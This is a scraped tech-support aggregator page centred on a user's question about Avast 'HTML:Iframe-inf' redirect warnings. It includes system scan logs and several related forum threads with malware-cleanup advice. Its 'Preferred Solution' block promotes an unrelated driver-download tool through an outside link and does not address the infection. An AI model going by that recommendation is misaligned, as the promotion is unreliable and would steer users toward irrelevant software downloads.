Over 1 million tech questions and answers.

HTML : Iframe - inf

Q: HTML : Iframe - inf

Hello Gracious Help,I run XP Pro on a Pentium 4, 3ghz (Dell GX270).3 days ago, I had my Firefox browser open, but had not used it or been at the puter for about 5 hours. When I sat down at the puter, there were perhaps 10 Avast warning pop-ups within about 15 mins - that said that it had blocked me from opening a malicious site. The trouble was, I was not trying to open any sites at this time. Two of the sites it specified were a beastiality site and a zoo site - neither of which I have ever been to.Avast seemed to block my browser from opening these sites, but my question is - what was directing my browser to go to them in the first place? The Avast warning said that the virus (or malware) that it was protecting me from was HTML:Iframe-infA web search came up with a few complex suggestions on how to rid of fix this problem, but all were too complex for me to follow.The hijacking or redirecting (or whatever it was) has not happened again since. I have had no further Avast warnings over the last 2 days. I first looked for help from the Avast website, and spoke to an IYogi support rep on the phone (whose number I got from the Avast website). He took remote control of my puter, checked my registry and said he could help if I bought a $186.00 support pkge (that provided support for 6 months). In retrospect, the "Help for Avast Free" phone number is just a marketing ploy to sell support packages. I just hope the guy did not add spyware or key loggers (or such) onto my system while he was in my puter. I am afraid to use my puter for any banking or secure sites until I am again sure that it is clean (from both the original problem, and the guy who took remote control of my puter).Below are all of the logs that your "Prep to post" area requested. I followed all the Preparations steps as closely as I could. One problem: GMER ran the moment I opened it - before I could shut off IAT/EAT box (as instructed). This scan produced a very quick, short report. So I then unchecked the IAT/EAT box (as instructed) and ran a second scan. This scan took a long time and is very lengthy. I tried to include both scans, but I got a message that my post was too long and had to shorten it, so I did not submit the 2nd longer scan (when the IAT/EAT box was unchecked). Please ask me if you want this scan, and I will email it to you (or send it by any method you request). Thank-you very much for any help that you can offer.DDS Log.DDS (Ver_2011-08-26.01) - NTFSx86 Internet Explorer: 8.0.6001.18702 BrowserJavaVersion: 1.6.0_29Run by Administrator at 12:38:00 on 2012-01-28Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.2047.1051 [GMT -6:00].AV: avast! Antivirus *Enabled/Updated* {7591DB91-41F0-48A3-B128-1A293FD8233D}.============== Running Processes ===============.C:\WINDOWS\system32\Ati2evxx.exeC:\WINDOWS\system32\svchost -k DcomLaunchsvchost.exeC:\WINDOWS\System32\svchost.exe -k netsvcsC:\Program Files\WTouch\WTouchService.exesvchost.exesvchost.exeC:\Program Files\AVAST Software\Avast\AvastSvc.exeC:\WINDOWS\system32\Ati2evxx.exeC:\Program Files\WTouch\WTouchUser.exeC:\WINDOWS\Explorer.EXEP:\Norton Ghost\Agent\VProTray.exeP:\Adobe Acrobat 9\Acrobat\Acrotray.exeC:\WINDOWS\system32\wscript.exeC:\Program Files\AVAST Software\Avast\avastUI.exeP:\Spybot\Spybot - Search & Destroy\TeaTimer.exeP:\RingCentral\eXtreme Fax\RCHotKey.exeC:\WINDOWS\system32\spoolsv.exeP:\TClock\tclock.exesvchost.exeC:\Program Files\Java\jre6\bin\jqs.exeC:\Program Files\Microsoft LifeCam\MSCamS32.exeP:\Norton Ghost\Agent\VProSvc.exeC:\WINDOWS\system32\IoctlSvc.exeC:\WINDOWS\system32\svchost.exe -k imgsvcC:\WINDOWS\system32\dllhost.exeC:\WINDOWS\system32\Pen_Tablet.exeC:\WINDOWS\system32\WTablet\Pen_TabletUser.exeC:\WINDOWS\system32\Pen_Tablet.exeC:\Program Files\Common Files\ComObjects\update.exeC:\WINDOWS\system32\dllhost.exeP:\Norton Ghost\Shared\Drivers\SymSnapService.exeC:\Program Files\Outlook Express\msimn.exeP:\PaltalkScene\paltalk.exeP:\Mozilla Firefox\firefox.exeP:\Mozilla Firefox\plugin-container.exeP:\Mozilla Firefox\plugin-container.exeC:\Documents and Settings\Administrator\Local Settings\Application Data\Google\Google Talk Plugin\googletalkplugin.exeP:\Defogger - disables CD Emulation programs\Defogger.exeC:\Program Files\AVAST Software\Avast\defs\12012800\Sf.bin.============== Pseudo HJT Report ===============.uStart Page = hxxp://start.shaw.ca/start/enCABHO: Adobe PDF Link Helper: {18df081c-e8ad-4283-a596-fa578c2ebdc3} - c:\program files\common files\adobe\acrobat\activex\AcroIEHelperShim.dllBHO: Spybot-S&D IE Protection: {53707962-6f74-2d53-2644-206d7942484f} - p:\spybot\spybot~1\SDHelper.dllBHO: avast! WebRep: {8e5e2654-ad2d-48bf-ac2d-d17f00898d06} - c:\program files\avast software\avast\aswWebRepIE.dllBHO: Adobe PDF Conversion Toolbar Helper: {ae7cd045-e861-484f-8273-0445ee161910} - c:\program files\common files\adobe\acrobat\activex\AcroIEFavClient.dllBHO: Java™ Plug-In 2 SSV Helper: {dbc80044-a445-435b-bc74-9c25c1c588a9} - c:\program files\java\jre6\bin\jp2ssv.dllBHO: JQSIEStartDetectorImpl Class: {e7e6f031-17ce-4c07-bc86-eabfe594f69c} - c:\program files\java\jre6\lib\deploy\jqs\ie\jqs_plugin.dllBHO: ChromeFrame BHO: {ecb3c477-1a0a-44bd-bb57-78f9efe34fa7} - c:\program files\google\chrome frame\application\16.0.912.77\npchrome_frame.dllBHO: SmartSelect Class: {f4971ee7-daa0-4053-9964-665d8ee6a077} - c:\program files\common files\adobe\acrobat\activex\AcroIEFavClient.dllTB: Adobe PDF: {47833539-d0c5-4125-9fa8-0819e2eaac93} - c:\program files\common files\adobe\acrobat\activex\AcroIEFavClient.dllTB: avast! WebRep: {8e5e2654-ad2d-48bf-ac2d-d17f00898d06} - c:\program files\avast software\avast\aswWebRepIE.dlluRun: [SpybotSD TeaTimer] p:\spybot\spybot - search & destroy\TeaTimer.exeuRun: [RCHotKey] "p:\ringcentral\extreme fax\RCHotKey.exe"uRun: [Google Update] "c:\documents and settings\administrator\local settings\application data\google\update\GoogleUpdate.exe" /cmRun: [IgfxTray] c:\windows\system32\igfxtray.exemRun: [HotKeysCmds] c:\windows\system32\hkcmd.exemRun: [Norton Ghost 14.0] "p:\norton ghost\agent\VProTray.exe"mRun: [<NO NAME>] mRun: [Adobe Acrobat Speed Launcher] "p:\adobe acrobat 9\acrobat\Acrobat_sl.exe"mRun: [Acrobat Assistant 8.0] "p:\adobe acrobat 9\acrobat\Acrotray.exe"mRun: [Adobe ARM] "c:\program files\common files\adobe\arm\1.0\AdobeARM.exe"mRun: [TaskMngr] wscript.exe "c:\program files\common files\comobjects\data.js"mRun: [avast] "c:\program files\avast software\avast\avastUI.exe" /noguiStartupFolder: c:\docume~1\admini~1\startm~1\programs\startup\shortc~1.lnk - p:\tclock\tclock.exeStartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\config~1.lnk - p:\winfax pro\WTNSETUP.EXEuPolicies-explorer: NoSMMyPictures = 01000000IE: Append Link Target to Existing PDF - c:\program files\common files\adobe\acrobat\activex\AcroIEFavClient.dll/AcroIEAppendSelLinks.htmlIE: Append to Existing PDF - c:\program files\common files\adobe\acrobat\activex\AcroIEFavClient.dll/AcroIEAppend.htmlIE: Convert Link Target to Adobe PDF - c:\program files\common files\adobe\acrobat\activex\AcroIEFavClient.dll/AcroIECaptureSelLinks.htmlIE: Convert to Adobe PDF - c:\program files\common files\adobe\acrobat\activex\AcroIEFavClient.dll/AcroIECapture.htmlIE: {4EAFEF58-EEFA-4116-983D-03B49BCBFFFE} - p:\paltalkscene\Paltalk.exeIE: {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exeIE: {FB5F1910-F110-11d2-BB9E-00C04F795683} - c:\program files\messenger\msmsgs.exeIE: {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - {53707962-6F74-2D53-2644-206D7942484F} - p:\spybot\spybot~1\SDHelper.dllTrusted Zone: skype.comDPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_29-windows-i586.cabDPF: {CAFEEFAC-0016-0000-0029-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_29-windows-i586.cabDPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_29-windows-i586.cabTCP: DhcpNameServer = 64.59.176.13 64.59.176.15 64.59.177.226TCP: Interfaces\{254EB178-E9B7-4052-A4CD-E4F748B9E8D8} : DhcpNameServer = 64.59.176.13 64.59.176.15 64.59.177.226Handler: gcf - {9875BFAF-B04D-445E-8A69-BE36838CDE3E} - c:\program files\google\chrome frame\application\16.0.912.77\npchrome_frame.dllNotify: AtiExtEvent - Ati2evxx.dllNotify: igfxcui - igfxsrvc.dllAppInit_DLLs: acaptuser32.dllSSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - c:\windows\system32\WPDShServiceObj.dllSEH: {A213B520-C6C2-11d0-AF9D-008029E1027E} - No FileHosts: 127.0.0.1 www.spywareinfo.com.================= FIREFOX ===================.FF - ProfilePath - c:\documents and settings\administrator\application data\mozilla\firefox\profiles\3nomuutp.default\FF - prefs.js: browser.startup.homepage - chrome://superstart/content/index.htmlFF - prefs.js: keyword.enabled - falseFF - component: c:\documents and settings\administrator\application data\mozilla\firefox\profiles\3nomuutp.default\extensions\{7e7165e2-0767-448c-852f-5fa8714f2c37}\components\PlainOldFavorites.dllFF - plugin: c:\documents and settings\administrator\application data\mozilla\plugins\npgoogletalk.dllFF - plugin: c:\documents and settings\administrator\application data\mozilla\plugins\npgtpo3dautoplugin.dllFF - plugin: c:\documents and settings\administrator\local settings\application data\google\update\1.3.21.79\npGoogleUpdate3.dllFF - plugin: c:\program files\google\update\1.2.183.39\npGoogleOneClick8.dllFF - plugin: c:\program files\google\update\1.3.21.53\npGoogleUpdate3.dllFF - plugin: c:\program files\google\update\1.3.21.57\npGoogleUpdate3.dllFF - plugin: c:\program files\google\update\1.3.21.65\npGoogleUpdate3.dllFF - plugin: c:\program files\google\update\1.3.21.69\npGoogleUpdate3.dllFF - plugin: c:\program files\google\update\1.3.21.79\npGoogleUpdate3.dllFF - plugin: c:\program files\java\jre6\bin\new_plugin\npdeployJava1.dllFF - plugin: p:\adobe acrobat 9\acrobat\browser\nppdf32.dllFF - plugin: p:\mozilla firefox\plugins\npdeployJava1.dllFF - plugin: p:\vlc media player\vlc\npvlc.dll.============= SERVICES / DRIVERS ===============.R1 aswSnx;aswSnx;c:\windows\system32\drivers\aswSnx.sys [2012-1-15 435032]R1 aswSP;aswSP;c:\windows\system32\drivers\aswSP.sys [2012-1-15 314456]R2 aswFsBlk;aswFsBlk;c:\windows\system32\drivers\aswFsBlk.sys [2012-1-15 20568]R2 avast! Antivirus;avast! Antivirus;c:\program files\avast software\avast\AvastSvc.exe [2012-1-15 44768]R2 Symantec SymSnap VSS Provider;Symantec SymSnap VSS Provider;c:\windows\system32\dllhost.exe [2008-4-14 5120]R2 TabletServicePen;TabletServicePen;c:\windows\system32\Pen_Tablet.exe [2010-11-13 4408616]R2 WTouchService;WTouch Service;c:\program files\wtouch\WTouchService.exe [2010-11-13 112936]R3 MSHUSBVideo;NX6000/NX3000/VX2000/VX5000/VX5500/VX7000/Cinema Filter Driver;c:\windows\system32\drivers\nx6000.sys [2010-12-12 30576]R3 SymSnapService;SymSnapService;p:\norton ghost\shared\drivers\SymSnapService.exe [2007-12-20 1558000]S0 cerc6;cerc6; [x]S2 BulkUsb;USB Scanner;c:\windows\system32\drivers\usbscan.sys [2010-2-25 15104]S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\microsoft.net\framework\v4.0.30319\mscorsvw.exe [2010-3-18 130384]S2 gupdate;Google Update Service (gupdate);c:\program files\google\update\GoogleUpdate.exe [2011-2-8 136176]S3 gupdatem;Google Update Service (gupdatem);c:\program files\google\update\GoogleUpdate.exe [2011-2-8 136176]S3 WPFFontCache_v0400;Windows Presentation Foundation Font Cache 4.0.0.0;c:\windows\microsoft.net\framework\v4.0.30319\wpf\WPFFontCache_v0400.exe [2010-3-18 753504].=============== Created Last 30 ================.2012-01-16 03:29:03 175616 ----a-w- c:\windows\system32\unrar.dll2012-01-16 02:50:03 435032 ----a-w- c:\windows\system32\drivers\aswSnx.sys2012-01-16 02:49:40 41184 ----a-w- c:\windows\avastSS.scr2012-01-16 02:49:23 -------- d-----w- c:\program files\AVAST Software2012-01-15 23:57:50 -------- d-----w- c:\documents and settings\administrator\local settings\application data\AMozilla2012-01-15 23:57:30 -------- d-----w- c:\documents and settings\administrator\application data\AMozilla2012-01-15 23:57:25 -------- d-----w- c:\program files\common files\ComObjects.==================== Find3M ====================.2012-01-27 22:05:32 196608 ----a-w- c:\windows\system32\drivers\nAsmedia.bin2012-01-14 02:59:31 414368 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl2011-12-10 21:24:06 20464 ----a-w- c:\windows\system32\drivers\mbam.sys2011-11-25 21:57:19 293376 ----a-w- c:\windows\system32\winsrv.dll2011-11-23 13:25:32 1859584 ----a-w- c:\windows\system32\win32k.sys2011-11-18 12:35:08 60416 ----a-w- c:\windows\system32\packager.exe2011-11-05 18:58:35 73728 ----a-w- c:\windows\system32\javacpl.cpl2011-11-05 18:58:35 472808 -c--a-w- c:\windows\system32\deployJava1.dll2011-11-04 19:20:51 916992 ----a-w- c:\windows\system32\wininet.dll2011-11-04 19:20:51 43520 ----a-w- c:\windows\system32\licmgr10.dll2011-11-04 19:20:51 1469440 ------w- c:\windows\system32\inetcpl.cpl2011-11-04 11:23:59 385024 ----a-w- c:\windows\system32\html.iec2011-11-03 15:28:36 386048 ----a-w- c:\windows\system32\qdvd.dll2011-11-03 15:28:36 1292288 ----a-w- c:\windows\system32\quartz.dll2011-11-01 16:07:10 1288704 ----a-w- c:\windows\system32\ole32.dll.============= FINISH: 12:42:16.46 ===============GMER - ark.txt (Auto run - before the AIT/EAT box could be unchecked)GMER 1.0.15.15641 - http://www.gmer.netRootkit quick scan 2012-01-28 14:33:41Windows 5.1.2600 Service Pack 3 Harddisk0\DR0 -> \Device\Ide\IdeDeviceP1T0L0-17 HDS728040PLA320 rev.PF1OA63ARunning: gmer.exe; Driver: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\pxtdapod.sys---- System - GMER 1.0.15 ----SSDT \SystemRoot\System32\Drivers\aswSnx.SYS (avast! Virtualization Driver/AVAST Software) ZwEnumerateKey [0xABF6EBDA]SSDT \SystemRoot\System32\Drivers\aswSnx.SYS (avast! Virtualization Driver/AVAST Software) ZwEnumerateValueKey [0xABF6EA45]Code \SystemRoot\System32\Drivers\aswSP.SYS (avast! self protection module/AVAST Software) ZwCreateProcessEx [0xABFEB7A2]Code \SystemRoot\System32\Drivers\aswSP.SYS (avast! self protection module/AVAST Software) ObInsertObjectCode \SystemRoot\System32\Drivers\aswSP.SYS (avast! self protection module/AVAST Software) ObMakeTemporaryObject---- Devices - GMER 1.0.15 ----Device \FileSystem\Ntfs \Ntfs aswSP.SYS (avast! self protection module/AVAST Software)AttachedDevice \FileSystem\Ntfs \Ntfs symsnap.sys (StorageCraft Volume Snap-Shot/StorageCraft)AttachedDevice \FileSystem\Ntfs \Ntfs aswMon2.SYS (avast! File System Filter Driver for Windows XP/AVAST Software)AttachedDevice \Driver\Tcpip \Device\Ip aswTdi.SYS (avast! TDI Filter Driver/AVAST Software)AttachedDevice \Driver\Tcpip \Device\Tcp aswTdi.SYS (avast! TDI Filter Driver/AVAST Software)AttachedDevice \Driver\Tcpip \Device\Udp aswTdi.SYS (avast! TDI Filter Driver/AVAST Software)AttachedDevice \Driver\Tcpip \Device\RawIp aswTdi.SYS (avast! TDI Filter Driver/AVAST Software)---- EOF - GMER 1.0.15 ----Please contact me for any further info or scans you may desire.A gracious thank-you in advance, for any explanation of why my browser was trying to take me to malicious websites (that Avast blocked), when it had been open for hours (perhaps with some tabs open), but I hadn't used it for hours. Thank you also for any help that you may be able to offer to ensure there is no malware that is causing this problem, that may still be on my system. Lastly,if you could check to see that my system is secure to do banking and visit other secure sites (without compromising privacy or passwords - after the IYogi rep had remote control) - that would also be greatly appreciated.Dave in Sask.

RELEVANCY SCORE 200
Preferred Solution: HTML : Iframe - inf

I recommend downloading and running DAP. It can help sort out any driver and firmware related issues on your system

It's worked out well for many of us in the past.

You can download it direct from this link http://downloaddap.org. (This link will open the download page of DAP so you can save a copy to your computer.)

A: HTML : Iframe - inf

Hello again,

Today I had the same problem again. When Avast kept giving me warnings and notifications that it has protected me from going onto malicious websites (even when I wasn't surfing), I pushed "More Info" button on the Avast pop-up, which took me to the Avast webpages that explained more about the infection (and attempted browser hijackings or re-direction, or whatever it is).

I did this for two Avast warning pop-ups (that tried to take me to two different malicious sites). Below are the URL's to the two Avast webpages that opened, when I clicked the "more info" button on the warning pop-up:

hxxp://www.avast.com/en-ca/lp-security-information-fp2?p_ext=0&utm_campaign=Virus_alert&utm_source=prg_fav_60_0&utm_medium=prg_systray&utm_content=.%2Ffa%2Fen-ca%2Fvirus-alert-challenger2&p_vir=html:Iframe-inf&p_prc=file://C:\Program%20Files\Common%20Files\ComObjects\update.exe&p_obj=http://www.allzoomovies.com/?x=4302&p_var=.%2Ffa%2Fen-ca%2Fvirus-alert-default2&p_pro=0&p_vep=6&p_ves=0&p_lqa=0&p_lsu=24&p_lst=0&p_lex=162&p_lng=en&p_lid=en-ca&p_elm=7&p_vbd=1367
hxxp://www.avast.com/en-ca/lp-security-information-fp2?p_ext=0&utm_campaign=Virus_alert&utm_source=prg_fav_60_0&utm_medium=prg_systray&utm_content=.%2Ffa%2Fen-ca%2Fvirus-alert-challenger2&p_vir=html:Iframe-inf&p_prc=file://C:\Program%20Files\Common%20Files\ComObjects\update.exe&p_obj=http://www.animalsexmania.net/?x=9171.5825.7884.4683&p_var=.%2Ffa%2Fen-ca%2Fvirus-alert-default2&p_pro=0&p_vep=6&p_ves=0&p_lqa=0&p_lsu=24&p_lst=0&p_lex=162&p_lng=en&p_lid=en-ca&p_elm=7&p_vbd=1367
Note that the first hijack or re-direct (or whatever) attempt tried to take my browser to allzoomovies.com, which is in the first (Avast website) URL above. The second attempt was to take my browser to www.animalsexmania.net The Avast pop-up popped up perhaps 10 times over a few mins, but it seemed to always be trying to take my browser to one of these two sites.
In addition, I saved the above two web pages in .htm format, and have attached them to this post. If they will open for you, you will see virtually the same pages that I saw when I went to these (Avast info) pages.

Hope this helps, and thanks again,

Daveinsk

Read other 41 answers
RELEVANCY SCORE 65.6

My PC was working very well and had no problem. I turned off after my work one night and when I switched on the next morning it does not open my home page. When I try to open my antivirus Avast gives me warning. The name of the virus is HTML:Iframe-inf Please help me to get rid of this. I am not able to ope my home Page.
More over my system has become very slow especially during the start up. Please help.
Thank you!

Read other answers
RELEVANCY SCORE 64.8

I have a laptop running windows 7, eset security ver 4 and malwarebytes.
 
I ran a computer scan with eset and got the message saying I was infected with this virus and gave 2 different paths. It didn't give me the option to clean, only delete and do nothing. So I deleted the files, but they keep coming back. I'm not at my computer to send a screenshot.
 
Please let me know what I need to do to start the process of getting this virus out of my laptop, it's driving me nuts!

A:Infected with HTML/Iframe.B.Gen

Hello danny reboot into Safe Mode with Networking... Empty your temp folders using TFC (Temporary File Cleaner)
[list]Please download TFC by Old Timer and save it to your desktop.
alternate download linkSave any unsaved work. (TFC will close ALL open programs including your browser!)Double-click on TFC.exe to run it. (If you are using Vista, right-click on the file and choose "Run As Administrator".)Click the Start button to begin the cleaning process and let it run uninterrupted to completion.Important! If TFC prompts you to reboot, please do so immediately. If not prompted, manually reboot the machine anyway allowing Windows to load normally (not into Safe Mode) to ensure a complete clean.Run ESET again.

Read other 9 answers
RELEVANCY SCORE 64.8

Problem: I upload to websites from work, home, and satellite office. I installed Filezilla FTP program to upload to all three locations about 3 months ago. Mid-June, my websites started indicating they were virus-infected when opening them up through a browser. At work I have McAffee Anti-Virus and at home I use AVAST. The AVAST is telling me I have a Trojan HTML:IFrame-HY [Trj]. From what I have read with the Filezilla problem, the iframe injects into the index pages of a website. On my index.html page, it creates a frame or space that causes my page to appear jumbled. On the index.php pages of my company site, it causes a PHP error message (I have a php calendar and a php quiz).

I tried uploading over these (through my file manager online) and the errors came back. I went online through my webhost and opened the files up through the file manager, deleted the code and pasted in what I thought was good code for the php pages. I did see injected code on this page before I deleted it and made a copy of it. This seems to have worked for the php index pages but my index.html page is still throwing virus warnings ? I can?t see any injected code in that page.

For what I understand about the Filezilla, it doesn?t protect the FTP passwords. I have another small website I work from home on and I deleted all of the files through the file manager online and uploaded what I believed to be cleaned files after changing my FTP passwords. When I previewed it in the bro... Read more

A:trojan HTML:IFrame-HY

bumping

Read other 1 answers
RELEVANCY SCORE 64.8

Hi All,

I have many (Url's & Htm) saved web pages in my PC
Suddenly ESET is detecting this alert in all of them (strange)
HTML/Iframe.B.Gen Virus

((i attached a photo to explain it))

I felt frustrated when I got this Alert
HTML/Iframe.B.Gen virus

And the only solution in ESET mind is to DELETE them .. not clean not disinfect..
isn't there any other solution to disinfect this virus ... that if the virus is really there ..

ESET is blocking opening them (The url or htm) .. the only way to open it is to disable the antivirus ..
and when I do that .. nothing wrong happen..

HELP PLEASE !!!!

((by the way: I dont want to zip any of my Url's and submit it to ESET, I want a solution how to disinfect this virus))
I tried Combofix, it didn't help

A:HTML/Iframe.B.Gen Virus (( HELP )) !?!?!?

This is the Photo

Read other 4 answers
RELEVANCY SCORE 64.8

I just did an eset scan that took an hour and a half. It showed that I had 2 infected files in my sons profile listed as "HTML/Iframe.B.Gen" virus. it says that it is in his mozilla data. Is this real, or a false positive? I am running Kapersky and it didn't throw up any red flags yet. HELP!

A:HTML/Iframe.B.Gen virus

Hello, ESET is very accurate,but not flawless.ESET Short description HTML/Iframe.B.Gen is generic detection of malicious IFRAME tags embedded in HTML pages, which redirect the browser to a specific URL location with malicious softwareThe <iframe> tag specifies an inline frame.An inline frame is used to embed another document within the current HTML document.--------------------------------------------------------------------------------To see if this is possibly a False positive. We should double check it before we take action.Lets' upload this file for a second opinion on what it actually is..Please make sure that you can view all hidden files. Instructions on how to do this can be found here:How to see hidden files in WindowsPlease click this link-->JottiWhen the jotti page has finished loading, click the Browse button and navigate to the following file and click Submit. <filepath>suspect.file Please post back the results of the scan in your next post.If Jotti is busy, try the same at Virustotal: http://www.virustotal.com/NOTE:For submission to a specific anti-virus vendor see Submitting Virus Samples: How to Submit a Virus.

Read other 5 answers
RELEVANCY SCORE 64.8

So, sometimes, i go onto the facebook main page, and avast 5 alerts me of hxxp://updateinfo22.com/info.js A Facebook: HTML:IFrame-HH [Trj] virus. Is it a false positive or a real virus.

A:Facebook: HTML:IFrame-HH [Trj]

Hi,Sorry for the delay in replying to your topic.Performing a quick Google search reveals that the update22 domain has been reported as a malware domain. As such;Please download Malwarebytes Anti-Malware (v1.44) and save it to your desktop.Download Link 1Download Link 2MBAM may "make changes to your registry" as part of its disinfection routine. If using other security programs that detect registry changes (ie Spybot's Teatimer), they may interfere or alert you. Temporarily disable such programs or permit them to allow the changes.Make sure you are connected to the Internet.Double-click on mbam-setup.exe to install the application.
For instructions with screenshots, please refer to the How to use Malwarebytes' Anti-Malware Guide.When the installation begins, follow the prompts and do not make any changes to default settings.When installation has finished, make sure you leave both of these checked:Update Malwarebytes' Anti-MalwareLaunch Malwarebytes' Anti-MalwareThen click Finish.MBAM will automatically start and you will be asked to update the program before performing a scan.If an update is found, the program will automatically update itself. Press the OK button to close that box and continue.If you encounter any problems while downloading the definition updates, manually download them from here and just double-click on mbam-rules.exe to install.On the Scanner tab:Make sure the "Perform Quick Scan" option is selected.Then click on the Scan button.If asked to select the drive... Read more

Read other 1 answers
RELEVANCY SCORE 64.8

I have my website by name:padasalgi.tripod.com since 11 years.Today when I tried to goto my site I am getting the following alert message and connection to any files in this url are disconnected. I am very much afraid since the contents of my webpages could not be surfed by any one due to this malware.I am quite new to the malware/worms etc I humbly request will any one please advise and guide me how this malware virus could be removed. The details of the malware alert are as under:avast!WarningA Virus Was Found!There is no reason to worry,though avast! has stopped the malware before it could enter your computer.When you click on the "Abort connection" button, the download of the dangerous file will be cancelled.File name: http://padasalgi.tripod.com/\{gzip}Malware name :HTML.Iframe-infMalware type : Virus/WormVPS version : 091227-0,12/*27/2009I once again request everybody please help me in removing this virus.

Read other answers
RELEVANCY SCORE 64.8

My stepson has downloaded a virus onto my laptop.
I ran a full scan using malwarebytes, superantispyware, & avast and removed everything they found but my computer still isn't working properly.
The task manager has been remotely disabled and i can't seem to turn it back on, i cannot sytem restore, & everytime i open a new web page avast flags up as finding a virus 'HTML:Iframe.inf' as many as 5 times per page. (When I ran avast it found over 1000 of these).
I am including a hijack this log
I really need help here as I don't know what I am doing when i get beyond the basics.
Thanks in advance and here's the hijackthis log

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 23:02:02, on 02/02/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16762)
Boot mode: Normal

Running processes:
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\Program Files\Lavasoft\Ad-Aware\aawservice.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\acs.exe
C:\Program Files\Google\Common\Goo... Read more

A:I can't get rid of HTML:Iframe-inf virus

Hello and welcome to TSF.

HijackThis is not used as the initial analysis tool in this forum.

We want all our members to perform the steps outlined in the link given below, before posting for assistance. There's a sticky at the top of this forum, and a
Quote:




Having problems with spyware and pop-ups? First Steps




link at the top of each page.

Please follow our pre-posting process outlined here:

http://www.techsupportforum.com/f50/...lp-305963.html

After running through all the steps, you shall have a proper set of logs. Please post them in a new topic, as this one shall be closed.

If you have trouble with one of the steps, simply move on to the next one, and make note of it in your reply.

Read other 1 answers
RELEVANCY SCORE 64.8

i need help with this virus Thanks

html/iframe.B.Gen virus

this virus is on my laptop

im running vista 64 bit

A:i need help with this html/iframe.B.Gen virus

Welcome aboard Download Security Check from HERE, and save it to your Desktop. * Double-click SecurityCheck.exe * Follow the onscreen instructions inside of the black box. * A Notepad document should open automatically called checkup.txt; please post the contents of that document.=============================================================================Please download Farbar Service Scanner (FSS) and run it on the computer with the issue.Make sure the following options are checked:
Internet ServicesWindows FirewallSystem RestoreSecurity Center/Action CenterWindows UpdatePress "Scan".It will create a log (FSS.txt) in the same directory the tool is run.Please copy and paste the log to your reply.====================================================================================Please download MiniToolBox and run it.Checkmark following boxes:Report IE Proxy SettingsReport FF Proxy SettingsList content of HostsList IP configurationList Winsock EntriesList last 10 Event Viewer logList Installed ProgramsList Devices (do NOT change any settings here)List Users, Partitions and Memory sizeClick Go and post the result.=============================================================================Download Malwarebytes' Anti-Malware (aka MBAM): http://www.malwarebytes.org/products/malwarebytes_free to your desktop. * Double-click mbam-setup.exe and follow the prompts to install the program. * At the end, be sure a checkmark is placed next to Update Malware... Read more

Read other 10 answers
RELEVANCY SCORE 64.8

I have run eset online scanner tool and it identifies problem as HTML/Iframe.B.Gen virus and JS/Exploit.Agent.NHC trojan.  The eset tool never completes its scan.  I have run Malwarebyte's and Rogue Killer.  Each removed some other malware but repeating those scans don't find anything now.  PC is very slow.  I have attempted to run CCleaner and it never completes it's analysis when scanning for temporary Internet files.  This is an office PC.  QS1 and Integra/Docutrack are legit applications.
 
Thanks for any help provided. 
 
DDS (Ver_2012-11-20.01) - NTFS_AMD64 NETWORK
Internet Explorer: 8.0.7601.17514
Run by NSSUser at 8:48:44 on 2014-08-07
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.3998.1045 [GMT -4:00]
.
SP: Windows Defender *Enabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\mfevtps.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\ctfmon.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Program Files (x86)\Task Killer\TaskKil... Read more

A:HTML/Iframe.B.Gen virus

Hi there,my name is Marius and I will assist you with your malware related problems.Before we move on, please read the following points carefully. First, read my instructions completely. If there is anything that you do not understand kindly ask before proceeding. Perform everything in the correct order. Sometimes one step requires the previous one. If you have any problems while following my instructions, Stop there and tell me the exact nature of your problem. Do not run any other scans without instruction or add/remove software unless I tell you to do so. This would change the output of our tools and could be confusing for me. Post all logfiles as a reply rather than as an attachment unless I specifically ask you. If you can not post all logfiles in one reply, feel free to use more posts. If I don't hear from you within 3 days from this initial or any subsequent post, then this thread will be closed. Stay with me. I will give you some advice about prevention after the cleanup process. Absence of symptoms does not always mean the computer is clean. My first language is not english. So please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.  Please upload attach.txt as well and do the following:   Scan with Gmer rootkit scannerPlease download Gmer from here by clicking on the "Download EXE" Button.Double click on the randomly named GMER.exe. If asked to allow gmer.sys driver to load, please consent.If it giv... Read more

Read other 16 answers
RELEVANCY SCORE 64.8

